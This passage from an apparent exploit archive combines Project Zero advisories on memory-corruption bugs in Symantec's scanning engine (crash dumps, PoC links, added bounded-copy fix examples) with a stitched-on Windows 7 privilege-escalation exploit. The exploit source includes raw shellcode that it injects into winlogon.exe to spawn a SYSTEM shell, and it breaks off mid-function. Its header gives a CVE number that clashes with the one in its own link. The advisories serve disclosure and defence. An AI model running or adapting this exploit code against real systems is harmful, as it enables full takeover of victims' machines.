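
/* Sizes read off the disassembly above (the names are mine, not Symantec's):
 * the name buffer is cleared with 0x100 dwords (1024 bytes), but the copy
 * loop only stops when the index reaches 0x1000 (4096). */
#define LZH_NAME_BUF 1024u
#define WRONG_LIMIT  4096u

/* Model of the original termination logic, evaluated on the field length
 * only: true when the original check would allow a store beyond buf[1023]. */
bool original_check_overflows(size_t field_len)
{
    size_t stores = field_len < WRONG_LIMIT ? field_len : WRONG_LIMIT;
    return stores > LZH_NAME_BUF;
}

/* Bounded replacement: the limit is the destination size, and an oversized
 * field is rejected rather than silently truncated (a header name that does
 * not fit the format's own limit is malformed anyway).
 * Returns the number of bytes copied, or -1 on rejection. */
long copy_header_name(const uint8_t *src, size_t field_len,
                      uint8_t *dst, size_t dst_size)
{
    if (src == NULL || dst == NULL)
        return -1;
    if (field_len >= dst_size)          /* keep one byte for the NUL */
        return -1;
    memcpy(dst, src, field_len);
    dst[field_len] = 0;
    return (long)field_len;
}

/* Stand-alone demonstration on a constructed 2000-byte name field:
 * 2000 < 4096, so the original check would store all 2000 bytes into a
 * 1024-byte buffer; the bounded copy refuses the same field. */
int main(void)
{
    uint8_t name[LZH_NAME_BUF];
    uint8_t field[2000];
    memset(field, 'A', sizeof field);

    bool unsafe = original_check_overflows(sizeof field);
    long copied = copy_header_name(field, sizeof field, name, sizeof name);
    return (unsafe && copied == -1) ? 0 : 1;
}
```

The check in copy_header_name compares against the size of the buffer it writes to, which is the property the original loop lacks: its limit (0x1000) was chosen independently of the buffer it indexes (0x400 bytes), so the two could drift apart without any compiler or reviewer noticing.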

#0  0xf5606d95 in CSymLHA::get_header(SymLHA::_S_LzHeader*) () from libdec2lha.so
#1  0xf5607af4 in CSymLHA::GetEntry(SymLHA::_S_LzHeader*) () from libdec2lha.so
#2  0xf55e83d5 in CLHAEngine::ProcessChildren(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, CSymLHA*) () from libdec2lha.so
#3  0xf55e8a8f in CLHAEngine::Process(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, bool*, bool*) () from libdec2lha.so
#4  0xf5c137b5 in CDecomposer::DecProcess(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) () 
#5  0xf5c143cb in CDecomposer::Process(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
(gdb) c
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

Because Symantec do not use -fstack-protector on Linux, exploitation is remarkably trivial. Exploitation is likely still possible on Windows, but may be more difficult as they do use /GS on that platform.

This issue is remotely exploitable just by receiving an email, visiting a website, and so on.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40032.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=810

A major component of the Symantec Antivirus scan engine is the "Decomposer", responsible for unpacking various archive formats such as ZIP, RAR, and so on. The decomposer runs as NT AUTHORITY\SYSTEM on Windows, and root on Linux and Mac. It is self-evident from looking at the decomposer code that Symantec have based the RAR decompression on the open-source unrar package from RAR labs (Note: this is permitted by the unrar license).

By comparing Symantec's code to the open source code, I have determined that Symantec are probably using version 4.1.4 of the unrar code, released in January 2012. The most current version is version 5.3.11.

Between the version of unrar that Symantec runs as NT AUTHORITY\SYSTEM to unpack untrusted binaries received over the network and the current version, literally hundreds of critical memory corruption bugs have been resolved.

I have verified that multiple publicly known vulnerabilities affect Symantec, and can result in remote code execution as NT AUTHORITY\SYSTEM on Windows and root on Linux and Mac.

I have verified this on the following products:

    Norton Antivirus, Windows
    Symantec Endpoint Protection, Linux and Windows
    Symantec Scan Engine, Linux and Windows

Presumably this affects all other Symantec products using the core Symantec scan engine.

In my opinion, I'm being exceptionally generous considering this issue a new vulnerability and not public information. Frankly, it is astonishing that Symantec do not track new releases of third party code they use. I think you should take this opportunity to check all other third party code you're using to verify you haven't fallen behind.

I've attached a trivial example that modifies an arbitrary index in the PlaceA[] array via Unpack::ShortLZ(). 


(534.adc): Access violation - code c0000005 (!!! second chance !!!)
eax=14858d00 ebx=07da63e0 ecx=07da65ec edx=fb6e43a0 esi=07da6370 edi=daf72217
eip=6d7b4016 esp=0da8d260 ebp=0da8d27c iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010286
ccScanw!filelengthi64+0x470b6:
6d7b4016 8994be005d0000  mov     dword ptr [esi+edi*4+5D00h],edx ds:002b:73b748cc=14858d00
0:052> lm v mccScanw
start    end        module name
6d690000 6d8bf000   ccScanw    (export symbols)       C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
    Loaded symbol image file: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
    Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
    Image name: ccScanw.dll
    Timestamp:        Tue Jan 26 13:51:55 2016 (56A7EA7B)
    CheckSum:         0022B3ED
    ImageSize:        0022F000
    File version:     13.1.2.19
    Product version:  13.1.2.19
    File flags:       0 (Mask 3F)
    File OS:          40004 NT Win32
    File type:        1.0 App
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Symantec Corporation
    ProductName:      Symantec Security Technologies
    InternalName:     ccScan
    OriginalFilename: CCSCAN.DLL
    ProductVersion:   13.1.2.19
    FileVersion:      13.1.2.19
    FileDescription:  Symantec Scan Engine
    LegalCopyright:   Copyright (c) 2015 Symantec Corporation. All rights reserved.

These bugs are obviously exploitable for remote code execution on all Symantec customer machines as root or SYSTEM.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40031.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=818

Symantec attempts to clean or remove components from archives or other multipart containers that they detect as malicious. The code that they use to remove components from MIME encoded messages in CMIMEParser::UpdateHeader() assumes that filenames cannot be longer than 77 characters.

This assumption is obviously incorrect, names can be any length, resulting in a very clean heap overflow.

The heap overflow occurs because Symantec does the cleaning in multiple stages, first changing the Content-Type to "text/plain", then changing the filename to "DELETED.TXT". The problem is that during the first stage of this process, they maintain the existing name but use a buffer prepared for the final name.

Something like:

char *buf = malloc(strlen(NewContentType) + strlen(LengthOfNewEncodedFilename) + 100);

// First change the content-type, appending each piece to the buffer
strcpy(buf, "Content-Type: ");
strcat(buf, NewContentType);
strcat(buf, "; name=\"");
strcat(buf, OldFileName);

...
UpdateName(buf, NewFileName);
...

This obviously won't work, because it doesn't verify that the old name will fit. I've attached an example MIME message that triggers this code in Symantec Scan Engine.
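The following is an added C example of how the two-stage rewrite described above can be done without the overflow. It is not Symantec's code: the function names, the sizing helper and the 300-character sample filename are my own, and only the stage values ("text/plain", "DELETED.TXT") and the sketch's sizing formula come from the text. The point it demonstrates is that the scratch buffer has to be sized for the longest name it will ever hold, which in stage one is still the original, attacker-chosen name, and that a bounded write should refuse, not truncate, a header that does not fit.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Values the text gives for the two cleaning stages. */
static const char *kNewType = "text/plain";
static const char *kNewName = "DELETED.TXT";

/* Size the scratch buffer for the longest name it will ever hold.  The
 * intermediate header still carries the original name, so sizing for the
 * final name alone (as the sketch above does) is the root cause. */
static size_t header_buf_size(const char *type, const char *old_name,
                              const char *new_name)
{
    size_t longest = strlen(old_name) > strlen(new_name)
                   ? strlen(old_name) : strlen(new_name);
    return strlen("Content-Type: ") + strlen(type)
         + strlen("; name=\"") + longest + strlen("\"") + 1 /* NUL */;
}

/* Write one header into buf.  snprintf never writes past buf_size, and its
 * return value tells us whether the header would have been cut; a cut
 * header is an error, not something to pass along. */
static int build_header(char *buf, size_t buf_size,
                        const char *type, const char *name)
{
    int n = snprintf(buf, buf_size, "Content-Type: %s; name=\"%s\"", type, name);
    if (n < 0 || (size_t)n >= buf_size)
        return -1;
    return n;
}

/* The two-stage cleaning the text describes, with one buffer sized for
 * both stages.  On success *out holds the final header (caller frees). */
int clean_mime_part(const char *old_name, char **out)
{
    size_t size = header_buf_size(kNewType, old_name, kNewName);
    char *buf = malloc(size);
    if (buf == NULL)
        return -1;
    if (build_header(buf, size, kNewType, old_name) < 0 ||  /* stage 1 */
        build_header(buf, size, kNewType, kNewName) < 0) {  /* stage 2 */
        free(buf);
        return -1;
    }
    *out = buf;
    return 0;
}

/* For comparison: the sketch's sizing, which only counts the new name.
 * Returns 1 when the stage-1 header (old name) would not fit in it. */
int original_sizing_overflows(const char *old_name)
{
    size_t original = strlen(kNewType) + strlen(kNewName) + 100;
    size_t stage1 = strlen("Content-Type: ") + strlen(kNewType)
                  + strlen("; name=\"") + strlen(old_name) + 2;
    return stage1 > original;
}

/* A constructed 300-character filename for the demonstration. */
const char *long_constructed_name(void)
{
    static char name[301];
    memset(name, 'A', 300);
    name[300] = '\0';
    return name;
}

int main(void)
{
    char *hdr = NULL;
    int unsafe = original_sizing_overflows(long_constructed_name());
    int rc = clean_mime_part(long_constructed_name(), &hdr);
    if (rc == 0) {
        puts(hdr);
        free(hdr);
    }
    return (unsafe == 1 && rc == 0) ? 0 : 1;
}
```

Two design choices matter here. The size is derived from the actual inputs of every stage rather than from a guessed constant, so there is no hidden assumption about filename length to get wrong; and build_header treats an over-long result as a failure, which is what a scanner that is about to rewrite attacker-controlled MIME should do rather than emit a silently mangled header.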


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40034.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=819

Simple fuzzing found an integer overflow in the dec2tnef library. This allocation from Attachment::setDataFromAttachment() doesn't verify that the attacker-controlled value doesn't wrap:

.text:000227B8 8D 42 01                       lea     eax, [edx+1]
.text:000227BB 89 85 68 FF FF+                mov     [ebp+var_98], eax
.text:000227C1 8B 83 CC FF FF+                mov     eax, ds:(_ZSt7nothrow_ptr - 42CFCh)[ebx]
.text:000227C7 89 44 24 04                    mov     [esp+4], eax
.text:000227CB 8B 85 68 FF FF+                mov     eax, [ebp+var_98]
.text:000227D1 C1 E0 02                       shl     eax, 2
.text:000227D4 89 04 24                       mov     [esp], eax
.text:000227D7 89 95 5C FF FF+                mov     [ebp+src], edx
.text:000227DD 89 8D 58 FF FF+                mov     [ebp+var_A8], ecx
.text:000227E3 E8 54 22 FE FF                 call    __ZnajRKSt9nothrow_t ; operator new[](uint,std::nothrow_t const&)

That's (count + 1) * 4, without any check that the multiplication succeeds without wrapping. The attached testcase reaches this code on Symantec Scan Engine; I'm not sure which other products use this code.

(gdb) bt
#1  0x07e88816 in Attachment::setDataFromAttachment(Item&) () from definitions/Decomposer/libdec2tnef.so
#2  0x07e88abc in Attachment::setAttribute(Item&) () from definitions/Decomposer/libdec2tnef.so
#3  0x07e8a1b4 in TNEFObject::getAttachments(_IO_FILE*, MList&) () from definitions/Decomposer/libdec2tnef.so
#4  0x07e6c1d6 in CTNEFArchive::Open(char const*) () from definitions/Decomposer/libdec2tnef.so
#5  0x07e6ae5f in CTNEFEngine::OpenArchive(CTNEFArchive*, bool*) () from definitions/Decomposer/libdec2tnef.so
#6  0x07e6b8c0 in CTNEFEngine::Process(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, bool*, bool*) () from definitions/Decomposer/libdec2tnef.so
#7  0x063d07b5 in CDecomposer::DecProcess(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) () 
#8  0x063d13cb in CDecomposer::Process(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
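What the unchecked (count + 1) * 4 computes on a 32-bit build, next to an overflow-checked and capped version of the same allocation, as an added example (my code, not the dec2tnef library's; the element size of 4, the 1 MiB policy cap and the sample counts are constructed):

```c
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>

/* What the unchecked expression computes with 32-bit unsigned arithmetic:
 * the product silently wraps, so a huge count yields a tiny allocation. */
uint32_t unchecked_element_bytes(uint32_t count, uint32_t elem_size)
{
    return (count + 1u) * elem_size;
}

/* Compute (count + 1) * elem_size, reporting failure instead of wrapping.
 * Returns 0 and stores the byte count, or -1 if either step would overflow. */
int checked_element_bytes(uint32_t count, uint32_t elem_size, uint32_t *out_bytes)
{
    if (elem_size == 0 || count == UINT32_MAX) return -1;   /* count + 1 wraps */
    uint32_t n = count + 1u;
    if (n > UINT32_MAX / elem_size) return -1;               /* n * elem_size wraps */
    *out_bytes = n * elem_size;
    return 0;
}

/* Allocate the array for a count read from the file: overflow-checked and
 * additionally capped, because a count that merely fits in 32 bits can still
 * be an absurd allocation for one attachment. Returns NULL on any failure. */
void *alloc_attachment_array(uint32_t count, uint32_t elem_size, uint32_t max_bytes)
{
    uint32_t bytes;
    if (checked_element_bytes(count, elem_size, &bytes) != 0) return NULL;
    if (bytes > max_bytes) return NULL;
    return calloc((size_t)count + 1u, elem_size);
}

int main(void)
{
    uint32_t bytes;
    uint32_t hostile = 0x3FFFFFFFu;   /* constructed: (hostile + 1) * 4 == 2^32 */
    printf("unchecked: %u bytes\n", unchecked_element_bytes(hostile, 4));
    printf("checked:   %s\n", checked_element_bytes(hostile, 4, &bytes) == 0 ? "ok" : "rejected");
    void *p = alloc_attachment_array(10, 4, 1u << 20);
    printf("count 10:  %s\n", p ? "allocated" : "rejected");
    free(p);
    return 0;
}
```

The later loop that fills the array would index past a wrapped allocation; rejecting the count before allocating is the only place the check can live, since the size arithmetic is already wrong by the time operator new[] sees it.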


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40035.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=823

A PowerPoint PPT file is a complicated OLE compound document comprising a series of streams. The format is described by Microsoft in [MS-PPT].

https://msdn.microsoft.com/en-us/library/office/cc313106(v=office.12).aspx

Symantec have implemented an I/O abstraction layer for seeking within the streams of a compound document, which they use to extract embedded objects like VBA macros and so on. Unfortunately, a bug in this I/O abstraction results in a critical security vulnerability. The bug occurs when a read request can be satisfied from the cache, but from a non-zero start offset. In this case, the request size is always rounded to (CACHE_SIZE - Offset), which may not be correct.

For example, a read request that can be satisfied from the stream cache in these ways:


+-------------------------+
|        CACHE            |
+-------------------------+

1.              <--------->   Non-zero offset, but entire cache needed.
2. <------>                   Zero offset, but not the entire cache.
3. <---------------------->   Entire cache.
4.         <---->             Non-zero offset and not entire cache.

All of these cases work fine except 4, where a buffer overflow occurs, because the request is rounded up to (CACHE_SIZE - Offset). It seems incredible that this bug wasn't found during testing or even on ITW documents just by chance. Nevertheless, by carefully constructing a PowerPoint file with a series of records that massage the cache, we can trigger a stack buffer overflow of attacker-controlled data.

The easiest way to do this is via PPFindRecSet in libdec2ss (this is part of ccScanw.dll on Windows). Early on when processing powerpoint documents Symantec attempt to find the last edit via RT_UserEditAtom, then extract a set of records for RT_List and RT_ExternalObjectList allowing us to massage the stream cache appropriately.

Naturally, Symantec disable /GS on Windows and do not use -fstack-protector, making exploitation absolutely trivial. The attached document redirects execution to 0x41414141 reliably on Windows.

0:065> g
(1074.a14): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=000025a0 ecx=00000200 edx=000025a0 esi=0396e358 edi=00002524
eip=41414141 esp=056df558 ebp=00000000 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???
0:065> lmv m ccScanW
start    end        module name
65820000 65a4f000   ccScanw    (deferred)             
    Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
    Image name: ccScanw.dll
    Timestamp:        Tue Jan 26 13:51:55 2016 (56A7EA7B)
    CheckSum:         0022B3ED
    ImageSize:        0022F000
    File version:     13.1.2.19
    Product version:  13.1.2.19
    File flags:       0 (Mask 3F)
    File OS:          40004 NT Win32
    File type:        1.0 App
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Symantec Corporation
    ProductName:      Symantec Security Technologies
    InternalName:     ccScan
    OriginalFilename: CCSCAN.DLL
    ProductVersion:   13.1.2.19
    FileVersion:      13.1.2.19
    FileDescription:  Symantec Scan Engine
    LegalCopyright:   Copyright (c) 2015 Symantec Corporation. All rights reserved.


The fix is simply to round up requests to MIN(RequestSize, CACHE_SIZE).
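A small cached stream reader that handles all four cases from the diagram, with the flawed (CACHE_SIZE - Offset) length kept only as a computed number for comparison, as an added example (my code, not Symantec's I/O layer; CACHE_SIZE of 64, the stream_t layout and the 200-byte sample stream are constructed):

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CACHE_SIZE 64   /* constructed value; the engine's real cache size is not given */

typedef struct {
    const uint8_t *data;    /* backing stream (an in-memory buffer here) */
    size_t len;
    uint8_t cache[CACHE_SIZE];
    size_t cache_start;     /* stream offset held in cache[0] */
    size_t cache_len;       /* valid bytes currently in the cache */
} stream_t;

void stream_init(stream_t *s, const uint8_t *data, size_t len)
{
    s->data = data; s->len = len; s->cache_start = 0; s->cache_len = 0;
}

static void fill_cache(stream_t *s, size_t pos)
{
    size_t n = s->len - pos;
    if (n > CACHE_SIZE) n = CACHE_SIZE;
    memcpy(s->cache, s->data + pos, n);
    s->cache_start = pos;
    s->cache_len = n;
}

/* The flawed rounding the report describes: on a cache hit at a non-zero
 * offset the copy length becomes (cache_len - offset) regardless of how small
 * the request was. Returned only as a number here, never used for a copy. */
size_t hit_len_flawed(size_t cache_len, size_t offset, size_t want)
{
    (void)want;
    return cache_len - offset;
}

/* Correct bound: never more than requested, never past the end of the cache. */
size_t hit_len_fixed(size_t cache_len, size_t offset, size_t want)
{
    size_t avail = cache_len - offset;
    return want < avail ? want : avail;
}

/* Read up to `want` bytes at `pos` into `dst`, serving from the cache when the
 * position lies inside it. May return fewer bytes than requested (short read). */
size_t stream_read(stream_t *s, size_t pos, uint8_t *dst, size_t want)
{
    if (pos >= s->len) return 0;
    if (pos < s->cache_start || pos >= s->cache_start + s->cache_len)
        fill_cache(s, pos);
    size_t off = pos - s->cache_start;
    size_t n = hit_len_fixed(s->cache_len, off, want);
    memcpy(dst, s->cache + off, n);
    return n;
}

/* Loop over short reads until `want` bytes are delivered or the stream ends. */
size_t stream_read_full(stream_t *s, size_t pos, uint8_t *dst, size_t want)
{
    size_t total = 0;
    while (total < want) {
        size_t n = stream_read(s, pos + total, dst + total, want - total);
        if (n == 0) break;
        total += n;
    }
    return total;
}

int main(void)
{
    uint8_t data[200], dst[16];
    for (size_t i = 0; i < sizeof data; i++) data[i] = (uint8_t)i;   /* constructed stream */
    stream_t s;
    stream_init(&s, data, sizeof data);
    stream_read(&s, 0, dst, 16);              /* primes the cache with bytes 0..63 */
    size_t n = stream_read(&s, 10, dst, 8);   /* case 4: inside the cache, partial */
    printf("asked 8, got %zu; flawed rounding would copy %zu\n",
           n, hit_len_flawed(s.cache_len, 10, 8));
    return 0;
}
```

Case 4 is the one to test explicitly: a request of 8 bytes at offset 10 into a 64-byte cache must copy 8, whereas the flawed length is 54, which is the amount that lands past the end of an 8-byte destination.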

I verified this bug exists on the following products:

* Norton Antivirus (All Platforms)
* Symantec Endpoint (All Platforms)
* Symantec Scan Engine (All Platforms)
* Symantec Email Security (All Platforms)

And probably all other Symantec and Norton branded products.


NOTES:

PPGetVBAEmbedListInfo() uses PPFindRecSet(), which is definitely the easiest way to exploit this. The prototype is something like:

int PPFindRecSet(tagSS_STREAM *stream,
                 unsigned StartOffset,
                 unsigned EndOffset,
                 short count,
                 short *RequiredRecordTypes,
                 unsigned *RecordOffsets,
                 int *RecordLengths);


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40037.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=821

A major component of the Symantec Antivirus scan engine is the "Decomposer", responsible for unpacking various archive formats such as ZIP, RAR, and so on. The decomposer runs as NT AUTHORITY\SYSTEM on Windows, and root on Linux and Mac. Simple fuzzing of zip archives discovered missing bounds checks in the routine ALPkOldFormatDecompressor::UnShrink, used to decode Zip archives. 

The routine uses a 16-bit value read from the file to index a 256-element array without any bounds checking; the attached testcase should demonstrate this reliably. I have verified this on the following products:

    Norton Antivirus, Windows
    Symantec Endpoint Protection, Linux and Windows
    Symantec Scan Engine, Linux and Windows


(534.700): Access violation - code c0000005 (!!! second chance !!!)
eax=00003000 ebx=00003000 ecx=00003000 edx=00002000 esi=16adeb58 edi=16ad8b1b
eip=6ba47ec3 esp=16ad6af0 ebp=16adeb20 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
ccScanw!filelengthi64+0x3af63:
6ba47ec3 66399445fcbfffff cmp     word ptr [ebp+eax*2-4004h],dx ss:002b:16ae0b1c=????
0:071> ub
ccScanw!filelengthi64+0x3af3f:
6ba47e9f 8bb5ec7fffff    mov     esi,dword ptr [ebp-8014h]
6ba47ea5 8bc7            mov     eax,edi
6ba47ea7 8985e07fffff    mov     dword ptr [ebp-8020h],eax
6ba47ead e96d010000      jmp     ccScanw!filelengthi64+0x3b0bf (6ba4801f)
6ba47eb2 0fbfc3          movsx   eax,bx
6ba47eb5 ba00200000      mov     edx,2000h
6ba47eba 8dbdfb9fffff    lea     edi,[ebp-6005h]
6ba47ec0 0fb7cb          movzx   ecx,bx
0:071> lmv m ccScanw
start    end        module name
6b930000 6bb5f000   ccScanw    (export symbols)       C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
    Loaded symbol image file: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
    Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
    Image name: ccScanw.dll
    Timestamp:        Tue Jan 26 13:51:55 2016 (56A7EA7B)
    CheckSum:         0022B3ED
    ImageSize:        0022F000
    File version:     13.1.2.19
    Product version:  13.1.2.19
    File flags:       0 (Mask 3F)
    File OS:          40004 NT Win32
    File type:        1.0 App
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Symantec Corporation
    ProductName:      Symantec Security Technologies
    InternalName:     ccScan
    OriginalFilename: CCSCAN.DLL
    ProductVersion:   13.1.2.19
    FileVersion:      13.1.2.19
    FileDescription:  Symantec Scan Engine
    LegalCopyright:   Copyright (c) 2015 Symantec Corporation. All rights reserved.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40036.zip
            
/* 
# Exploit Title: Elevation of privilege on Windows 7 SP1 x86
# Date: 28/06-2016
# Exploit Author: @blomster81
# Vendor Homepage: www.microsoft.com
# Version: Windows 7 SP1 x86
# Tested on: Windows 7 SP1 x86
# CVE : 2016-0400

MS16-014 EoP PoC created from 
https://github.com/Rootkitsmm/cve-2016-0040/blob/master/poc.cc
Spawns CMD.exe with SYSTEM rights. 
Overwrites HaliSystemQueryInformation, but does not replace it, so BSOD will occur at some point

********* EDB Note *********

ntos.h is available here: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40039.zip

***************************

*/

#include "stdafx.h"
#include <Windows.h>
#include <winioctl.h>
#include "ntos.h"
#include <TlHelp32.h>


typedef union {
	HANDLE Handle;
	ULONG64 Handle64;
	ULONG32 Handle32;
}
HANDLE3264, *PHANDLE3264;

typedef struct {
	ULONG HandleCount;
	ULONG Action;
	HANDLE /* PUSER_THREAD_START_ROUTINE */ UserModeCallback;
	HANDLE3264 UserModeProcess;
	HANDLE3264 Handles[20];
}
WMIRECEIVENOTIFICATION, *PWMIRECEIVENOTIFICATION;

#define RECEIVE_ACTION_CREATE_THREAD 2 // Mark guid objects as requiring

typedef struct {
	IN VOID * ObjectAttributes;
	IN ACCESS_MASK DesiredAccess;

	OUT HANDLE3264 Handle;
}
WMIOPENGUIDBLOCK, *PWMIOPENGUIDBLOCK;

typedef enum _KPROFILE_SOURCE {
	ProfileTime,
	ProfileAlignmentFixup,
	ProfileTotalIssues,
	ProfilePipelineDry,
	ProfileLoadInstructions,
	ProfilePipelineFrozen,
	ProfileBranchInstructions,
	ProfileTotalNonissues,
	ProfileDcacheMisses,
	ProfileIcacheMisses,
	ProfileCacheMisses,
	ProfileBranchMispredictions,
	ProfileStoreInstructions,
	ProfileFpInstructions,
	ProfileIntegerInstructions,
	Profile2Issue,
	Profile3Issue,
	Profile4Issue,
	ProfileSpecialInstructions,
	ProfileTotalCycles,
	ProfileIcacheIssues,
	ProfileDcacheAccesses,
	ProfileMemoryBarrierCycles,
	ProfileLoadLinkedIssues,
	ProfileMaximum

} KPROFILE_SOURCE, *PKPROFILE_SOURCE;

typedef struct _DESKTOPINFO
{
	/* 000 */ PVOID        pvDesktopBase;
	/* 008 */ PVOID        pvDesktopLimit;

} DESKTOPINFO, *PDESKTOPINFO;


typedef struct _CLIENTINFO
{
	/* 000 */ DWORD             CI_flags;
	/* 004 */ DWORD             cSpins;
	/* 008 */ DWORD             dwExpWinVer;
	/* 00c */ DWORD             dwCompatFlags;
	/* 010 */ DWORD             dwCompatFlags2;
	/* 014 */ DWORD             dwTIFlags;
	/* 018 */ DWORD				filler1;
	/* 01c */ DWORD				filler2;
	/* 020 */ PDESKTOPINFO      pDeskInfo;
	/* 028 */ ULONG_PTR         ulClientDelta;

} CLIENTINFO, *PCLIENTINFO;

typedef struct _HANDLEENTRY {
	PVOID  phead;
	ULONG_PTR  pOwner;
	BYTE  bType;
	BYTE  bFlags;
	WORD  wUniq;
}HANDLEENTRY, *PHANDLEENTRY;

typedef struct _SERVERINFO {
	DWORD dwSRVIFlags;
	DWORD64 cHandleEntries;
	WORD wSRVIFlags;
	WORD wRIPPID;
	WORD wRIPError;
}SERVERINFO, *PSERVERINFO;

typedef struct _SHAREDINFO {
	PSERVERINFO psi;
	PHANDLEENTRY aheList;
	ULONG HeEntrySize;
	ULONG_PTR pDispInfo;
	ULONG_PTR ulSharedDelta;
	ULONG_PTR awmControl;
	ULONG_PTR DefWindowMsgs;
	ULONG_PTR DefWindowSpecMsgs;
}SHAREDINFO, *PSHAREDINFO;

#define IOCTL_WMI_RECEIVE_NOTIFICATIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)

typedef ULONG(__stdcall *g_ZwMapUserPhysicalPages)(PVOID, ULONG, PULONG);
typedef NTSTATUS(_stdcall *_NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
typedef NTSTATUS(_stdcall *_NtQueryIntervalProfile)(KPROFILE_SOURCE ProfilSource, PULONG Interval);

DWORD g_HalDispatchTable = 0;
void* kHandle;
HWND g_window = NULL;
const WCHAR g_windowClassName[] = L"Victim_Window";
WNDCLASSEX wc;
PSHAREDINFO g_pSharedInfo;
PSERVERINFO g_pServerInfo;
HANDLEENTRY* g_UserHandleTable;

LRESULT CALLBACK WProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	return DefWindowProc(hwnd, uMsg, wParam, lParam);
}

DWORD getProcessId(wchar_t* str)
{
	HANDLE hProcessSnap;
	PROCESSENTRY32 pe32;
	DWORD PID;

	hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProcessSnap == INVALID_HANDLE_VALUE)
	{
		return 0;
	}

	pe32.dwSize = sizeof(PROCESSENTRY32);
	if (!Process32First(hProcessSnap, &pe32))
	{
		CloseHandle(hProcessSnap);
		return 0;
	}

	do
	{
		if (!wcscmp(pe32.szExeFile, str))
		{
			wprintf(L"Process: %s found\n", pe32.szExeFile);
			PID = pe32.th32ProcessID;
			return PID;
		}
	} while (Process32Next(hProcessSnap, &pe32));
	return 0;
}

void Launch()
{
	void* pMem;
	char shellcode[] =
		"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
		"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
		"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
		"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
		"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
		"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
		"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
		"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
		"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
		"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
		"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
		"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
		"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
		"\x65\x78\x65\x00";

	wchar_t* str = L"winlogon.exe";
	DWORD PID = getProcessId(str);
	HANDLE hEx = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
	pMem = VirtualAllocEx(hEx, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	DWORD res = WriteProcessMemory(hEx, pMem, shellcode, sizeof(shellcode), 0);
